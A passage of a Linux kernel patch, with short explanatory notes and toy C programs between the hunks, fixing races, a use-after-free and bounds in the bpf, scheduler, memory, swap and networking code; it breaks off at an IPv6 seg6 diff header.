+diff --git a/kernel/bpf/helpers.c b/kernel/bpf/helpers.c
+index 6a61a98d602cd..83f8f67e933df 100644
+--- a/kernel/bpf/helpers.c
++++ b/kernel/bpf/helpers.c
+@@ -1091,6 +1091,7 @@ struct bpf_hrtimer {
+ 	struct bpf_prog *prog;
+ 	void __rcu *callback_fn;
+ 	void *value;
++	struct rcu_head rcu;
+ };
+ 
+ /* the actual struct hidden inside uapi struct bpf_timer */
+@@ -1312,6 +1313,7 @@ BPF_CALL_1(bpf_timer_cancel, struct bpf_timer_kern *, timer)
+ 
+ 	if (in_nmi())
+ 		return -EOPNOTSUPP;
++	rcu_read_lock();
+ 	__bpf_spin_lock_irqsave(&timer->lock);
+ 	t = timer->timer;
+ 	if (!t) {
+@@ -1333,6 +1335,7 @@ BPF_CALL_1(bpf_timer_cancel, struct bpf_timer_kern *, timer)
+ 	 * if it was running.
+ 	 */
+ 	ret = ret ?: hrtimer_cancel(&t->timer);
++	rcu_read_unlock();
+ 	return ret;
+ }
+ 
+@@ -1387,7 +1390,7 @@ void bpf_timer_cancel_and_free(void *val)
+ 	 */
+ 	if (this_cpu_read(hrtimer_running) != t)
+ 		hrtimer_cancel(&t->timer);
+-	kfree(t);
++	kfree_rcu(t, rcu);
+ }
+ 
+ BPF_CALL_2(bpf_kptr_xchg, void *, map_value, void *, ptr)
+diff --git a/kernel/sched/rt.c b/kernel/sched/rt.c
+index 76bafa8d331a7..3a2335bc1d58b 100644
+--- a/kernel/sched/rt.c
++++ b/kernel/sched/rt.c
+@@ -37,6 +37,8 @@ static struct ctl_table sched_rt_sysctls[] = {
+ 		.maxlen         = sizeof(unsigned int),
+ 		.mode           = 0644,
+ 		.proc_handler   = sched_rt_handler,
++		.extra1         = SYSCTL_ONE,
++		.extra2         = SYSCTL_INT_MAX,
+ 	},
+ 	{
+ 		.procname       = "sched_rt_runtime_us",
+@@ -44,6 +46,8 @@ static struct ctl_table sched_rt_sysctls[] = {
+ 		.maxlen         = sizeof(int),
+ 		.mode           = 0644,
+ 		.proc_handler   = sched_rt_handler,
++		.extra1         = SYSCTL_NEG_ONE,
++		.extra2         = SYSCTL_INT_MAX,
+ 	},
+ 	{
+ 		.procname       = "sched_rr_timeslice_ms",
+@@ -2970,9 +2974,6 @@ static int sched_rt_global_constraints(void)
+ #ifdef CONFIG_SYSCTL
+ static int sched_rt_global_validate(void)
+ {
+-	if (sysctl_sched_rt_period <= 0)
+-		return -EINVAL;
+-
+ 	if ((sysctl_sched_rt_runtime != RUNTIME_INF) &&
+ 		((sysctl_sched_rt_runtime > sysctl_sched_rt_period) ||
+ 		 ((u64)sysctl_sched_rt_runtime *
+@@ -3003,7 +3004,7 @@ static int sched_rt_handler(struct ctl_table *table, int write, void *buffer,
+ 	old_period = sysctl_sched_rt_period;
+ 	old_runtime = sysctl_sched_rt_runtime;
+ 
+-	ret = proc_dointvec(table, write, buffer, lenp, ppos);
++	ret = proc_dointvec_minmax(table, write, buffer, lenp, ppos);
+ 
+ 	if (!ret && write) {
+ 		ret = sched_rt_global_validate();
+@@ -3047,6 +3048,9 @@ static int sched_rr_handler(struct ctl_table *table, int write, void *buffer,
+ 		sched_rr_timeslice =
+ 			sysctl_sched_rr_timeslice <= 0 ? RR_TIMESLICE :
+ 			msecs_to_jiffies(sysctl_sched_rr_timeslice);
++
++		if (sysctl_sched_rr_timeslice <= 0)
++			sysctl_sched_rr_timeslice = jiffies_to_msecs(RR_TIMESLICE);
+ 	}
+ 	mutex_unlock(&mutex);
+ 
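
With extra1/extra2 populated and proc_dointvec_minmax() doing the parsing, out-of-range writes are rejected before anything is stored, which is why the explicit period <= 0 test in sched_rt_global_validate() can go. A toy model of that ordering; store_clamped is invented:

#include <limits.h>
#include <stdio.h>

static int store_clamped(int val, int min, int max, int *dst)
{
	if (val < min || val > max)
		return -1; /* rejected during parsing, *dst untouched */
	*dst = val;
	return 0;
}

int main(void)
{
	int period_us = 1000000;

	printf("%d\n", store_clamped(0, 1, INT_MAX, &period_us)); /* -1 */
	printf("%d %d\n",
	       store_clamped(500000, 1, INT_MAX, &period_us), period_us);
	return 0;
}
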
+diff --git a/mm/damon/lru_sort.c b/mm/damon/lru_sort.c
+index 63bdad20dbaf8..98a678129b067 100644
+--- a/mm/damon/lru_sort.c
++++ b/mm/damon/lru_sort.c
+@@ -185,9 +185,21 @@ static struct damos *damon_lru_sort_new_cold_scheme(unsigned int cold_thres)
+ 	return damon_lru_sort_new_scheme(&pattern, DAMOS_LRU_DEPRIO);
+ }
+ 
++static void damon_lru_sort_copy_quota_status(struct damos_quota *dst,
++		struct damos_quota *src)
++{
++	dst->total_charged_sz = src->total_charged_sz;
++	dst->total_charged_ns = src->total_charged_ns;
++	dst->charged_sz = src->charged_sz;
++	dst->charged_from = src->charged_from;
++	dst->charge_target_from = src->charge_target_from;
++	dst->charge_addr_from = src->charge_addr_from;
++}
++
+ static int damon_lru_sort_apply_parameters(void)
+ {
+-	struct damos *scheme;
++	struct damos *scheme, *hot_scheme, *cold_scheme;
++	struct damos *old_hot_scheme = NULL, *old_cold_scheme = NULL;
+ 	unsigned int hot_thres, cold_thres;
+ 	int err = 0;
+ 
+@@ -195,18 +207,35 @@ static int damon_lru_sort_apply_parameters(void)
+ 	if (err)
+ 		return err;
+ 
++	damon_for_each_scheme(scheme, ctx) {
++		if (!old_hot_scheme) {
++			old_hot_scheme = scheme;
++			continue;
++		}
++		old_cold_scheme = scheme;
++	}
++
+ 	hot_thres = damon_max_nr_accesses(&damon_lru_sort_mon_attrs) *
+ 		hot_thres_access_freq / 1000;
+-	scheme = damon_lru_sort_new_hot_scheme(hot_thres);
+-	if (!scheme)
++	hot_scheme = damon_lru_sort_new_hot_scheme(hot_thres);
++	if (!hot_scheme)
+ 		return -ENOMEM;
+-	damon_set_schemes(ctx, &scheme, 1);
++	if (old_hot_scheme)
++		damon_lru_sort_copy_quota_status(&hot_scheme->quota,
++				&old_hot_scheme->quota);
+ 
+ 	cold_thres = cold_min_age / damon_lru_sort_mon_attrs.aggr_interval;
+-	scheme = damon_lru_sort_new_cold_scheme(cold_thres);
+-	if (!scheme)
++	cold_scheme = damon_lru_sort_new_cold_scheme(cold_thres);
++	if (!cold_scheme) {
++		damon_destroy_scheme(hot_scheme);
+ 		return -ENOMEM;
+-	damon_add_scheme(ctx, scheme);
++	}
++	if (old_cold_scheme)
++		damon_lru_sort_copy_quota_status(&cold_scheme->quota,
++				&old_cold_scheme->quota);
++
++	damon_set_schemes(ctx, &hot_scheme, 1);
++	damon_add_scheme(ctx, cold_scheme);
+ 
+ 	return damon_set_region_biggest_system_ram_default(target,
+ 					&monitor_region_start,
+diff --git a/mm/damon/reclaim.c b/mm/damon/reclaim.c
+index 162c9b1ca00fd..cc337e94acfda 100644
+--- a/mm/damon/reclaim.c
++++ b/mm/damon/reclaim.c
+@@ -141,9 +141,20 @@ static struct damos *damon_reclaim_new_scheme(void)
+ 			&damon_reclaim_wmarks);
+ }
+ 
++static void damon_reclaim_copy_quota_status(struct damos_quota *dst,
++		struct damos_quota *src)
++{
++	dst->total_charged_sz = src->total_charged_sz;
++	dst->total_charged_ns = src->total_charged_ns;
++	dst->charged_sz = src->charged_sz;
++	dst->charged_from = src->charged_from;
++	dst->charge_target_from = src->charge_target_from;
++	dst->charge_addr_from = src->charge_addr_from;
++}
++
+ static int damon_reclaim_apply_parameters(void)
+ {
+-	struct damos *scheme;
++	struct damos *scheme, *old_scheme;
+ 	int err = 0;
+ 
+ 	err = damon_set_attrs(ctx, &damon_reclaim_mon_attrs);
+@@ -154,6 +165,11 @@ static int damon_reclaim_apply_parameters(void)
+ 	scheme = damon_reclaim_new_scheme();
+ 	if (!scheme)
+ 		return -ENOMEM;
++	if (!list_empty(&ctx->schemes)) {
++		damon_for_each_scheme(old_scheme, ctx)
++			damon_reclaim_copy_quota_status(&scheme->quota,
++					&old_scheme->quota);
++	}
+ 	damon_set_schemes(ctx, &scheme, 1);
+ 
+ 	return damon_set_region_biggest_system_ram_default(target,
+diff --git a/mm/memblock.c b/mm/memblock.c
+index 511d4783dcf1d..516efec80851a 100644
+--- a/mm/memblock.c
++++ b/mm/memblock.c
+@@ -175,8 +175,9 @@ static inline phys_addr_t memblock_cap_size(phys_addr_t base, phys_addr_t *size)
+ /*
+  * Address comparison utilities
+  */
+-static unsigned long __init_memblock memblock_addrs_overlap(phys_addr_t base1, phys_addr_t size1,
+-				       phys_addr_t base2, phys_addr_t size2)
++unsigned long __init_memblock
++memblock_addrs_overlap(phys_addr_t base1, phys_addr_t size1, phys_addr_t base2,
++		       phys_addr_t size2)
+ {
+ 	return ((base1 < (base2 + size2)) && (base2 < (base1 + size1)));
+ }
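
The newly exported helper is the standard half-open interval intersection test: [base1, base1+size1) and [base2, base2+size2) overlap iff each base lies below the other range's end. A stand-alone version with addrs_overlap as a local stand-in:

#include <stdint.h>
#include <stdio.h>

typedef uint64_t phys_addr_t;

static unsigned long addrs_overlap(phys_addr_t base1, phys_addr_t size1,
				   phys_addr_t base2, phys_addr_t size2)
{
	return (base1 < (base2 + size2)) && (base2 < (base1 + size1));
}

int main(void)
{
	printf("%lu\n", addrs_overlap(0x1000, 0x1000, 0x1800, 0x1000)); /* 1 */
	printf("%lu\n", addrs_overlap(0x1000, 0x1000, 0x2000, 0x1000)); /* 0: merely adjacent */
	return 0;
}
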
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 9da98e3e71cfe..4570d3e315cf1 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -7517,9 +7517,13 @@ bool mem_cgroup_swap_full(struct folio *folio)
+ 
+ static int __init setup_swap_account(char *s)
+ {
+-	pr_warn_once("The swapaccount= commandline option is deprecated. "
+-		     "Please report your usecase to linux-mm@kvack.org if you "
+-		     "depend on this functionality.\n");
++	bool res;
++
++	if (!kstrtobool(s, &res) && !res)
++		pr_warn_once("The swapaccount=0 commandline option is deprecated "
++			     "in favor of configuring swap control via cgroupfs. "
++			     "Please report your usecase to linux-mm@kvack.org if you "
++			     "depend on this functionality.\n");
+ 	return 1;
+ }
+ __setup("swapaccount=", setup_swap_account);
+diff --git a/mm/memory.c b/mm/memory.c
+index fc8b264ec0cac..fb83cf56377ab 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3761,6 +3761,7 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ 	struct page *page;
+ 	struct swap_info_struct *si = NULL;
+ 	rmap_t rmap_flags = RMAP_NONE;
++	bool need_clear_cache = false;
+ 	bool exclusive = false;
+ 	swp_entry_t entry;
+ 	pte_t pte;
+@@ -3822,6 +3823,20 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ 	if (!folio) {
+ 		if (data_race(si->flags & SWP_SYNCHRONOUS_IO) &&
+ 		    __swap_count(entry) == 1) {
++			/*
++			 * Prevent parallel swapin from proceeding with
++			 * the cache flag. Otherwise, another thread may
++			 * finish swapin first, free the entry, and swapout
++			 * reusing the same entry. It's undetectable as
++			 * pte_same() returns true due to entry reuse.
++			 */
++			if (swapcache_prepare(entry)) {
++				/* Relax a bit to prevent rapid repeated page faults */
++				schedule_timeout_uninterruptible(1);
++				goto out;
++			}
++			need_clear_cache = true;
++
+ 			/* skip swapcache */
+ 			folio = vma_alloc_folio(GFP_HIGHUSER_MOVABLE, 0,
+ 						vma, vmf->address, false);
+@@ -4073,6 +4088,9 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ unlock:
+ 	pte_unmap_unlock(vmf->pte, vmf->ptl);
+ out:
++	/* Clear the swap cache pin for direct swapin after PTL unlock */
++	if (need_clear_cache)
++		swapcache_clear(si, entry);
+ 	if (si)
+ 		put_swap_device(si);
+ 	return ret;
+@@ -4086,6 +4104,8 @@ vm_fault_t do_swap_page(struct vm_fault *vmf)
+ 		folio_unlock(swapcache);
+ 		folio_put(swapcache);
+ 	}
++	if (need_clear_cache)
++		swapcache_clear(si, entry);
+ 	if (si)
+ 		put_swap_device(si);
+ 	return ret;
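
The fix serializes swapcache-skipping swapins of the same entry: whoever loses the swapcache_prepare() race backs off and retries the fault instead of installing a stale page. A rough model using a C11 atomic flag in place of the SWAP_HAS_CACHE bit on the swap map; all names are invented:

#include <stdatomic.h>
#include <stdio.h>

static atomic_flag entry_pinned = ATOMIC_FLAG_INIT;

static int swapin_try_claim(void)
{
	if (atomic_flag_test_and_set(&entry_pinned))
		return -1; /* parallel swapin in flight: back off, retry fault */
	return 0;
}

static void swapin_release(void)
{
	atomic_flag_clear(&entry_pinned); /* swapcache_clear() counterpart */
}

int main(void)
{
	printf("%d\n", swapin_try_claim());	/*  0: first claim wins */
	printf("%d\n", swapin_try_claim());	/* -1: second racer blocked */
	swapin_release();
	printf("%d\n", swapin_try_claim());	/*  0: free again */
	return 0;
}
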
+diff --git a/mm/swap.h b/mm/swap.h
+index cc08c459c6190..5eff40ef76934 100644
+--- a/mm/swap.h
++++ b/mm/swap.h
+@@ -39,6 +39,7 @@ void __delete_from_swap_cache(struct folio *folio,
+ void delete_from_swap_cache(struct folio *folio);
+ void clear_shadow_from_swap_cache(int type, unsigned long begin,
+ 				  unsigned long end);
++void swapcache_clear(struct swap_info_struct *si, swp_entry_t entry);
+ struct folio *swap_cache_get_folio(swp_entry_t entry,
+ 		struct vm_area_struct *vma, unsigned long addr);
+ struct page *find_get_incore_page(struct address_space *mapping, pgoff_t index);
+@@ -98,6 +99,10 @@ static inline int swap_writepage(struct page *p, struct writeback_control *wbc)
+ 	return 0;
+ }
+ 
++static inline void swapcache_clear(struct swap_info_struct *si, swp_entry_t entry)
++{
++}
++
+ static inline struct folio *swap_cache_get_folio(swp_entry_t entry,
+ 		struct vm_area_struct *vma, unsigned long addr)
+ {
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index 71db6d8a1ea30..cca9fda9d036f 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -3373,6 +3373,19 @@ int swapcache_prepare(swp_entry_t entry)
+ 	return __swap_duplicate(entry, SWAP_HAS_CACHE);
+ }
+ 
++void swapcache_clear(struct swap_info_struct *si, swp_entry_t entry)
++{
++	struct swap_cluster_info *ci;
++	unsigned long offset = swp_offset(entry);
++	unsigned char usage;
++
++	ci = lock_cluster_or_swap_info(si, offset);
++	usage = __swap_entry_free_locked(si, offset, SWAP_HAS_CACHE);
++	unlock_cluster_or_swap_info(si, ci);
++	if (!usage)
++		free_swap_slot(entry);
++}
++
+ struct swap_info_struct *swp_swap_info(swp_entry_t entry)
+ {
+ 	return swap_type_to_swap_info(swp_type(entry));
+diff --git a/mm/zswap.c b/mm/zswap.c
+index b3829ada4a413..b7cb126797f9e 100644
+--- a/mm/zswap.c
++++ b/mm/zswap.c
+@@ -1013,6 +1013,8 @@ static int zswap_writeback_entry(struct zpool *pool, unsigned long handle)
+ 		if (zswap_rb_search(&tree->rbroot, entry->offset) != entry) {
+ 			spin_unlock(&tree->lock);
+ 			delete_from_swap_cache(page_folio(page));
++			unlock_page(page);
++			put_page(page);
+ 			ret = -ENOMEM;
+ 			goto fail;
+ 		}
+diff --git a/net/bridge/br_switchdev.c b/net/bridge/br_switchdev.c
+index 4b3982c368b35..b61ef2dff7a4b 100644
+--- a/net/bridge/br_switchdev.c
++++ b/net/bridge/br_switchdev.c
+@@ -593,21 +593,40 @@ br_switchdev_mdb_replay_one(struct notifier_block *nb, struct net_device *dev,
+ }
+ 
+ static int br_switchdev_mdb_queue_one(struct list_head *mdb_list,
++				      struct net_device *dev,
++				      unsigned long action,
+ 				      enum switchdev_obj_id id,
+ 				      const struct net_bridge_mdb_entry *mp,
+ 				      struct net_device *orig_dev)
+ {
+-	struct switchdev_obj_port_mdb *mdb;
++	struct switchdev_obj_port_mdb mdb = {
++		.obj = {
++			.id = id,
++			.orig_dev = orig_dev,
++		},
++	};
++	struct switchdev_obj_port_mdb *pmdb;
+ 
+-	mdb = kzalloc(sizeof(*mdb), GFP_ATOMIC);
+-	if (!mdb)
+-		return -ENOMEM;
++	br_switchdev_mdb_populate(&mdb, mp);
++
++	if (action == SWITCHDEV_PORT_OBJ_ADD &&
++	    switchdev_port_obj_act_is_deferred(dev, action, &mdb.obj)) {
++		/* This event is already in the deferred queue of
++		 * events, so this replay must be elided, lest the
++		 * driver receive duplicate events for it. This can
++		 * only happen when replaying additions, since
++		 * modifications are always immediately visible in
++		 * br->mdb_list, whereas actual event delivery may be
++		 * delayed.
++		 */
++		return 0;
++	}
+ 
+-	mdb->obj.id = id;
+-	mdb->obj.orig_dev = orig_dev;
+-	br_switchdev_mdb_populate(mdb, mp);
+-	list_add_tail(&mdb->obj.list, mdb_list);
++	pmdb = kmemdup(&mdb, sizeof(mdb), GFP_ATOMIC);
++	if (!pmdb)
++		return -ENOMEM;
+ 
++	list_add_tail(&pmdb->obj.list, mdb_list);
+ 	return 0;
+ }
+ 
+@@ -675,51 +694,50 @@ br_switchdev_mdb_replay(struct net_device *br_dev, struct net_device *dev,
+ 	if (!br_opt_get(br, BROPT_MULTICAST_ENABLED))
+ 		return 0;
+ 
+-	/* We cannot walk over br->mdb_list protected just by the rtnl_mutex,
+-	 * because the write-side protection is br->multicast_lock. But we
+-	 * need to emulate the [ blocking ] calling context of a regular
+-	 * switchdev event, so since both br->multicast_lock and RCU read side
+-	 * critical sections are atomic, we have no choice but to pick the RCU
+-	 * read side lock, queue up all our events, leave the critical section
+-	 * and notify switchdev from blocking context.
++	if (adding)
++		action = SWITCHDEV_PORT_OBJ_ADD;
++	else
++		action = SWITCHDEV_PORT_OBJ_DEL;
++
++	/* br_switchdev_mdb_queue_one() will take care to not queue a
++	 * replay of an event that is already pending in the switchdev
++	 * deferred queue. In order to safely determine that, there
++	 * must be no new deferred MDB notifications enqueued for the
++	 * duration of the MDB scan. Therefore, grab the write-side
++	 * lock to avoid racing with any concurrent IGMP/MLD snooping.
+ 	 */
+-	rcu_read_lock();
++	spin_lock_bh(&br->multicast_lock);
+ 
+-	hlist_for_each_entry_rcu(mp, &br->mdb_list, mdb_node) {
++	hlist_for_each_entry(mp, &br->mdb_list, mdb_node) {
+ 		struct net_bridge_port_group __rcu * const *pp;
+ 		const struct net_bridge_port_group *p;
+ 
+ 		if (mp->host_joined) {
+-			err = br_switchdev_mdb_queue_one(&mdb_list,
++			err = br_switchdev_mdb_queue_one(&mdb_list, dev, action,
+ 							 SWITCHDEV_OBJ_ID_HOST_MDB,
+ 							 mp, br_dev);
+ 			if (err) {
+-				rcu_read_unlock();
++				spin_unlock_bh(&br->multicast_lock);
+ 				goto out_free_mdb;
+ 			}
+ 		}
+ 
+-		for (pp = &mp->ports; (p = rcu_dereference(*pp)) != NULL;
++		for (pp = &mp->ports; (p = mlock_dereference(*pp, br)) != NULL;
+ 		     pp = &p->next) {
+ 			if (p->key.port->dev != dev)
+ 				continue;
+ 
+-			err = br_switchdev_mdb_queue_one(&mdb_list,
++			err = br_switchdev_mdb_queue_one(&mdb_list, dev, action,
+ 							 SWITCHDEV_OBJ_ID_PORT_MDB,
+ 							 mp, dev);
+ 			if (err) {
+-				rcu_read_unlock();
++				spin_unlock_bh(&br->multicast_lock);
+ 				goto out_free_mdb;
+ 			}
+ 		}
+ 	}
+ 
+-	rcu_read_unlock();
+-
+-	if (adding)
+-		action = SWITCHDEV_PORT_OBJ_ADD;
+-	else
+-		action = SWITCHDEV_PORT_OBJ_DEL;
++	spin_unlock_bh(&br->multicast_lock);
+ 
+ 	list_for_each_entry(obj, &mdb_list, list) {
+ 		err = br_switchdev_mdb_replay_one(nb, dev,
+@@ -780,6 +798,16 @@ static void nbp_switchdev_unsync_objs(struct net_bridge_port *p,
+ 	br_switchdev_mdb_replay(br_dev, dev, ctx, false, blocking_nb, NULL);
+ 
+ 	br_switchdev_vlan_replay(br_dev, ctx, false, blocking_nb, NULL);
++
++	/* Make sure that the device leaving this bridge has seen all
++	 * relevant events before it is disassociated. In the normal
++	 * case, when the device is directly attached to the bridge,
++	 * this is covered by del_nbp(). If the association was indirect
++	 * however, e.g. via a team or bond, and the device is leaving
++	 * that intermediate device, then the bridge port remains in
++	 * place.
++	 */
++	switchdev_deferred_process();
+ }
+ 
+ /* Let the bridge know that this port is offloaded, so that it can assign a
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 1ba3662faf0aa..60619fe8af5fc 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -8861,7 +8861,7 @@ EXPORT_SYMBOL(dev_set_mac_address_user);
+ 
+ int dev_get_mac_address(struct sockaddr *sa, struct net *net, char *dev_name)
+ {
+-	size_t size = sizeof(sa->sa_data);
++	size_t size = sizeof(sa->sa_data_min);
+ 	struct net_device *dev;
+ 	int ret = 0;
+ 
+diff --git a/net/core/dev_ioctl.c b/net/core/dev_ioctl.c
+index 7674bb9f3076c..5cdbfbf9a7dcf 100644
+--- a/net/core/dev_ioctl.c
++++ b/net/core/dev_ioctl.c
+@@ -342,7 +342,7 @@ static int dev_ifsioc(struct net *net, struct ifreq *ifr, void __user *data,
+ 		if (ifr->ifr_hwaddr.sa_family != dev->type)
+ 			return -EINVAL;
+ 		memcpy(dev->broadcast, ifr->ifr_hwaddr.sa_data,
+-		       min(sizeof(ifr->ifr_hwaddr.sa_data),
++		       min(sizeof(ifr->ifr_hwaddr.sa_data_min),
+ 			   (size_t)dev->addr_len));
+ 		call_netdevice_notifiers(NETDEV_CHANGEADDR, dev);
+ 		return 0;
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 3818035ea0021..39643f78cf782 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -1217,8 +1217,11 @@ static void sk_psock_verdict_data_ready(struct sock *sk)
+ 
+ 		rcu_read_lock();
+ 		psock = sk_psock(sk);
+-		if (psock)
+-			psock->saved_data_ready(sk);
++		if (psock) {
++			read_lock_bh(&sk->sk_callback_lock);
++			sk_psock_data_ready(sk, psock);
++			read_unlock_bh(&sk->sk_callback_lock);
++		}
+ 		rcu_read_unlock();
+ 	}
+ }
+diff --git a/net/ipv4/arp.c b/net/ipv4/arp.c
+index 9456f5bb35e5d..ccff96820a703 100644
+--- a/net/ipv4/arp.c
++++ b/net/ipv4/arp.c
+@@ -1125,7 +1125,8 @@ static int arp_req_get(struct arpreq *r, struct net_device *dev)
+ 	if (neigh) {
+ 		if (!(READ_ONCE(neigh->nud_state) & NUD_NOARP)) {
+ 			read_lock_bh(&neigh->lock);
+-			memcpy(r->arp_ha.sa_data, neigh->ha, dev->addr_len);
++			memcpy(r->arp_ha.sa_data, neigh->ha,
++			       min(dev->addr_len, (unsigned char)sizeof(r->arp_ha.sa_data_min)));
+ 			r->arp_flags = arp_state_to_flags(neigh);
+ 			read_unlock_bh(&neigh->lock);
+ 			r->arp_ha.sa_family = dev->type;
+diff --git a/net/ipv4/devinet.c b/net/ipv4/devinet.c
+index 35d6e74be8406..bb0d1252cad86 100644
+--- a/net/ipv4/devinet.c
++++ b/net/ipv4/devinet.c
+@@ -1804,6 +1804,21 @@ static int in_dev_dump_addr(struct in_device *in_dev, struct sk_buff *skb,
+ 	return err;
+ }
+ 
++/* Combine dev_addr_genid and dev_base_seq to detect changes.
++ */
++static u32 inet_base_seq(const struct net *net)
++{
++	u32 res = atomic_read(&net->ipv4.dev_addr_genid) +
++		  net->dev_base_seq;
++
++	/* Must not return 0 (see nl_dump_check_consistent()).
++	 * Choose a value far away from 0.
++	 */
++	if (!res)
++		res = 0x80000000;
++	return res;
++}
++
+ static int inet_dump_ifaddr(struct sk_buff *skb, struct netlink_callback *cb)
+ {
+ 	const struct nlmsghdr *nlh = cb->nlh;
+@@ -1855,8 +1870,7 @@ static int inet_dump_ifaddr(struct sk_buff *skb, struct netlink_callback *cb)
+ 		idx = 0;
+ 		head = &tgt_net->dev_index_head[h];
+ 		rcu_read_lock();
+-		cb->seq = atomic_read(&tgt_net->ipv4.dev_addr_genid) ^
+-			  tgt_net->dev_base_seq;
++		cb->seq = inet_base_seq(tgt_net);
+ 		hlist_for_each_entry_rcu(dev, head, index_hlist) {
+ 			if (idx < s_idx)
+ 				goto cont;
+@@ -2257,8 +2271,7 @@ static int inet_netconf_dump_devconf(struct sk_buff *skb,
+ 		idx = 0;
+ 		head = &net->dev_index_head[h];
+ 		rcu_read_lock();
+-		cb->seq = atomic_read(&net->ipv4.dev_addr_genid) ^
+-			  net->dev_base_seq;
++		cb->seq = inet_base_seq(net);
+ 		hlist_for_each_entry_rcu(dev, head, index_hlist) {
+ 			if (idx < s_idx)
+ 				goto cont;
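
inet_base_seq() adds the two generation counters and remaps a zero result because, per its own comment, the sequence number handed to nl_dump_check_consistent() must never be 0; the addrconf.c hunk further below duplicates the same helper for IPv6. A stand-alone sketch with base_seq as an illustrative name:

#include <stdint.h>
#include <stdio.h>

static uint32_t base_seq(uint32_t addr_genid, uint32_t dev_base_seq)
{
	uint32_t res = addr_genid + dev_base_seq;

	if (!res)
		res = 0x80000000;
	return res;
}

int main(void)
{
	printf("0x%x\n", base_seq(7, 42));
	printf("0x%x\n", base_seq(0, 0)); /* remapped away from 0 */
	return 0;
}
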
+diff --git a/net/ipv4/inet_hashtables.c b/net/ipv4/inet_hashtables.c
+index f2ed2aed08ab3..56776e1b1de52 100644
+--- a/net/ipv4/inet_hashtables.c
++++ b/net/ipv4/inet_hashtables.c
+@@ -1111,10 +1111,33 @@ int __inet_hash_connect(struct inet_timewait_death_row *death_row,
+ 	return 0;
+ 
+ error:
++	if (sk_hashed(sk)) {
++		spinlock_t *lock = inet_ehash_lockp(hinfo, sk->sk_hash);
++
++		sock_prot_inuse_add(net, sk->sk_prot, -1);
++
++		spin_lock(lock);
++		sk_nulls_del_node_init_rcu(sk);
++		spin_unlock(lock);
++
++		sk->sk_hash = 0;
++		inet_sk(sk)->inet_sport = 0;
++		inet_sk(sk)->inet_num = 0;
++
++		if (tw)
++			inet_twsk_bind_unhash(tw, hinfo);
++	}
++
+ 	spin_unlock(&head2->lock);
+ 	if (tb_created)
+ 		inet_bind_bucket_destroy(hinfo->bind_bucket_cachep, tb);
+-	spin_unlock_bh(&head->lock);
++	spin_unlock(&head->lock);
++
++	if (tw)
++		inet_twsk_deschedule_put(tw);
++
++	local_bh_enable();
++
+ 	return -ENOMEM;
+ }
+ 
+diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
+index b8dc20fe7a4e2..46527b5cc8f0c 100644
+--- a/net/ipv6/addrconf.c
++++ b/net/ipv6/addrconf.c
+@@ -706,6 +706,22 @@ static int inet6_netconf_get_devconf(struct sk_buff *in_skb,
+ 	return err;
+ }
+ 
++/* Combine dev_addr_genid and dev_base_seq to detect changes.
++ */
++static u32 inet6_base_seq(const struct net *net)
++{
++	u32 res = atomic_read(&net->ipv6.dev_addr_genid) +
++		  net->dev_base_seq;
++
++	/* Must not return 0 (see nl_dump_check_consistent()).
++	 * Choose a value far away from 0.
++	 */
++	if (!res)
++		res = 0x80000000;
++	return res;
++}
++
+ static int inet6_netconf_dump_devconf(struct sk_buff *skb,
+ 				      struct netlink_callback *cb)
+ {
+@@ -739,8 +755,7 @@ static int inet6_netconf_dump_devconf(struct sk_buff *skb,
+ 		idx = 0;
+ 		head = &net->dev_index_head[h];
+ 		rcu_read_lock();
+-		cb->seq = atomic_read(&net->ipv6.dev_addr_genid) ^
+-			  net->dev_base_seq;
++		cb->seq = inet6_base_seq(net);
+ 		hlist_for_each_entry_rcu(dev, head, index_hlist) {
+ 			if (idx < s_idx)
+ 				goto cont;
+@@ -5326,7 +5341,7 @@ static int inet6_dump_addr(struct sk_buff *skb, struct netlink_callback *cb,
+ 	}
+ 
+ 	rcu_read_lock();
+-	cb->seq = atomic_read(&tgt_net->ipv6.dev_addr_genid) ^ tgt_net->dev_base_seq;
++	cb->seq = inet6_base_seq(tgt_net);
+ 	for (h = s_h; h < NETDEV_HASHENTRIES; h++, s_idx = 0) {
+ 		idx = 0;
+ 		head = &tgt_net->dev_index_head[h];
+diff --git a/net/ipv6/exthdrs.c b/net/ipv6/exthdrs.c
+index 5fa0e37305d9d..1cfdd9d950123 100644
+--- a/net/ipv6/exthdrs.c
++++ b/net/ipv6/exthdrs.c
+@@ -180,6 +180,8 @@ static bool ip6_parse_tlv(bool hopbyhop,
+ 				case IPV6_TLV_IOAM:
+ 					if (!ipv6_hop_ioam(skb, off))
+ 						return false;
++
++					nh = skb_network_header(skb);
+ 					break;
+ 				case IPV6_TLV_JUMBO:
+ 					if (!ipv6_hop_jumbo(skb, off))
+@@ -974,6 +976,14 @@ static bool ipv6_hop_ioam(struct sk_buff *skb, int optoff)
+ 		if (!skb_valid_dst(skb))
+ 			ip6_route_input(skb);
+ 
++		/* About to mangle packet header */
++		if (skb_ensure_writable(skb, optoff + 2 + hdr->opt_len))
++			goto drop;
++
++		/* Trace pointer may have changed */
++		trace = (struct ioam6_trace_hdr *)(skb_network_header(skb)
++						   + optoff + sizeof(*hdr));
++
+ 		ioam6_fill_trace_data(skb, ns, trace, true);
+ 		break;
+ 	default:
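
skb_ensure_writable() may reallocate the packet data, so the previously computed trace pointer has to be rebuilt from the fresh network header, exactly as the hunk above does. A userspace model of the same pointer-invalidation hazard using realloc():

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
	size_t optoff = 16;
	char *base = malloc(64);

	if (!base)
		return 1;
	strcpy(base + optoff, "trace");
	char *trace = base + optoff;		/* pointer derived from old base */

	char *new_base = realloc(base, 4096);	/* may move the data */
	if (!new_base) {
		free(base);
		return 1;
	}
	trace = new_base + optoff;		/* must be recomputed */

	printf("%s\n", trace);
	free(new_base);
	return 0;
}
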
+diff --git a/net/ipv6/seg6.c b/net/ipv6/seg6.c
+index 29346a6eec9ff..35508abd76f43 100644
